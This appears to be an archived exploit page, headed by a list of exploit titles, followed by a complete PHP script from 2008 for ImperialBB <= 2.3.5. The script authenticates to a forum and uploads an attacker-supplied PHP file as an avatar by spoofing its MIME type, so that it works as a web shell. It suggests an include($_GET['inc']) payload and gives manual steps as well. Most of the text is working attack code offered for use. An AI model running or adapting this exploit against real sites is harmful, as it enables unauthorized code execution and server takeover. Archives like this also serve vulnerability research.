
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
126 lines
6.1 KiB
PHP
Executable file
126 lines
6.1 KiB
PHP
Executable file
Title : ImperialBB <= 2.3.5 Remote File Upload Vulnerability
|
|
Date : 5th July 2008
|
|
Found by : PHPLizardo - http://phplizardo.2gb.fr
|
|
Greetz : Gu1ll4um3r0m41n
|
|
|
|
Howto : 1. Go to your User Control Panel
|
|
2. Upload any file you want
|
|
3. Tamper the request and change the mime-type to : image/gif
|
|
4. There is your file : http://site.com/[forum_path]/images/avatars/uploads/[your_nickname]_[filename].[ext]
|
|
|
|
<?php
|
|
/*
|
|
|
|
Title : ImperialBB <= 2.3.5 Remote Upload Vulnerability
|
|
Date : 5th July 2008
|
|
Found by : PHPLizardo
|
|
|
|
Description : This vulnerability can be used by a attacker to upload a malicious script on the webserver.
|
|
|
|
Greetz : irc.worldnet.net #carib0u
|
|
|
|
|
|
*/
|
|
|
|
if(count($argv) == 5)
|
|
{
|
|
echo "\n\n";
|
|
echo "+---------------------------------------------------------------+\r\n";
|
|
echo "| ImperialBB <= 2.3.5 Remote Upload Vulnerability |\r\n";
|
|
echo "| By PHPLizardo - irc.worldnet.net #carib0u |\r\n";
|
|
echo "| Usage: php exploit.php site.com /path/ user pass |\r\n";
|
|
echo "+---------------------------------------------------------------+\r\n";
|
|
echo "\n";
|
|
|
|
echo "Code to write in the file (ie. <?php include(\$_GET['inc']); ?>) :\r\n\n";
|
|
$code = trim(fgets(STDIN));
|
|
|
|
$socket = @fsockopen($argv[1], 80, $eno, $estr, 30);
|
|
if(!$socket)
|
|
{
|
|
die("Could not connect to ".$argv[1].". Operation aborted.");
|
|
}
|
|
|
|
$part1 = "POST " . $argv[2] . "profile.php?func=edit HTTP/1.1\r\n";
|
|
$part1 .= "Host: " . $argv[1] . "\r\n";
|
|
$part1 .= "Accept: */*\r\n";
|
|
$part1 .= "Connection: Close\r\n";
|
|
$part1 .= "Cookie: UserName=" . $argv[3] . "; Password=" . md5(md5($argv[4])) . "\r\n";
|
|
$part1 .= "Content-Type: multipart/form-data; boundary=---------------------------200831142015814\r\n";
|
|
|
|
$part2 .= "-----------------------------200831142015814\r\n";
|
|
$part2 .= "Content-Disposition: form-data; name=\"Email\"\r\n\r\n";
|
|
$part2 .= "test@test.test\r\n";
|
|
$part2 .= "-----------------------------200831142015814\r\n";
|
|
$part2 .= "Content-Disposition: form-data; name=\"Email2\"\r\n\r\n";
|
|
$part2 .= "test@test.test\r\n";
|
|
$part2 .= "-----------------------------200831142015814\r\n";
|
|
$part2 .= "Content-Disposition: form-data; name=\"OldPass\"\r\n\r\n\r\n";
|
|
$part2 .= "-----------------------------200831142015814\r\n";
|
|
$part2 .= "Content-Disposition: form-data; name=\"PassWord\"\r\n\r\n\r\n";
|
|
$part2 .= "-----------------------------200831142015814\r\n";
|
|
$part2 .= "Content-Disposition: form-data; name=\"Pass2\"\r\n\r\n\r\n";
|
|
$part2 .= "-----------------------------200831142015814\r\n";
|
|
$part2 .= "Content-Disposition: form-data; name=\"signature\"\r\n\r\n\r\n";
|
|
$part2 .= "-----------------------------200831142015814\r\n";
|
|
$part2 .= "Content-Disposition: form-data; name=\"aim\"\r\n\r\n\r\n";
|
|
$part2 .= "-----------------------------200831142015814\r\n";
|
|
$part2 .= "Content-Disposition: form-data; name=\"icq\"\r\n\r\n\r\n";
|
|
$part2 .= "-----------------------------200831142015814\r\n";
|
|
$part2 .= "Content-Disposition: form-data; name=\"msn\"\r\n\r\n\r\n";
|
|
$part2 .= "-----------------------------200831142015814\r\n";
|
|
$part2 .= "Content-Disposition: form-data; name=\"yahoo\"\r\n\r\n\r\n";
|
|
$part2 .= "-----------------------------200831142015814\r\n";
|
|
$part2 .= "Content-Disposition: form-data; name=\"Remote_Avatar_URL\"\r\n\r\n\r\n";
|
|
$part2 .= "-----------------------------200831142015814\r\n";
|
|
$part2 .= "Content-Disposition: form-data; name=\"Upload_Avatar\"; filename=\"funypicture.php\"\r\n";
|
|
$part2 .= "Content-Type: image/gif\r\n\r\n";
|
|
$part2 .= $code."\r\n";
|
|
$part2 .= "-----------------------------200831142015814\r\n";
|
|
$part2 .= "Content-Disposition: form-data; name=\"month\"\r\n\r\n";
|
|
$part2 .= "00\r\n";
|
|
$part2 .= "-----------------------------200831142015814\r\n";
|
|
$part2 .= "Content-Disposition: form-data; name=\"day\"\r\n\r\n";
|
|
$part2 .= "00\r\n";
|
|
$part2 .= "-----------------------------200831142015814\r\n";
|
|
$part2 .= "Content-Disposition: form-data; name=\"year\"\r\n\r\n";
|
|
$part2 .= "0000\r\n";
|
|
$part2 .= "-----------------------------200831142015814\r\n";
|
|
$part2 .= "Content-Disposition: form-data; name=\"website\"\r\n\r\n\r\n";
|
|
|
|
$part2 .= "-----------------------------200831142015814\r\n";
|
|
$part2 .= "Content-Disposition: form-data; name=\"location\"\r\n\r\n\r\n";
|
|
$part2 .= "-----------------------------200831142015814\r\n";
|
|
$part2 .= "Content-Disposition: form-data; name=\"email_on_pm\"\r\n\r\n";
|
|
$part2 .= "0\r\n";
|
|
$part2 .= "-----------------------------200831142015814\r\n";
|
|
$part2 .= "Content-Disposition: form-data; name=\"OldPass\"\r\n\r\n\r\n";
|
|
$part2 .= "-----------------------------200831142015814\r\n";
|
|
$part2 .= "Content-Disposition: form-data; name=\"Submit\"\r\n\r\n";
|
|
$part2 .= "Submit\r\n";
|
|
$part2 .= "-----------------------------200831142015814--\r\n";
|
|
|
|
$part1 .= "Content-Length: " . strlen($part2) . "\r\n\r\n";
|
|
|
|
|
|
|
|
$part1 .= $part2;
|
|
|
|
fwrite($socket, $part1);
|
|
|
|
echo "It might have worked, check if your file is online at -> http://" . $argv[1] . $argv[2] . "/images/avatars/uploads/" . $argv[3] . "_funypicture.php";
|
|
|
|
}
|
|
else
|
|
{
|
|
echo "\n\n";
|
|
echo "+----.-----------------------------------------------------------+\r\n";
|
|
echo "| ImperialBB <= 2.3.5 Remote Upload Vulnerability |\r\n";
|
|
echo "| By PHPLizardo - irc.worldnet.net #carib0u |\r\n";
|
|
echo "| Usage: php exploit.php site.com /path/ user pass |\r\n";
|
|
echo "+---------------------------------------------------------------+\r\n";
|
|
echo "\n\n";
|
|
}
|
|
?>
|
|
|
|
# milw0rm.com [2008-07-05]
|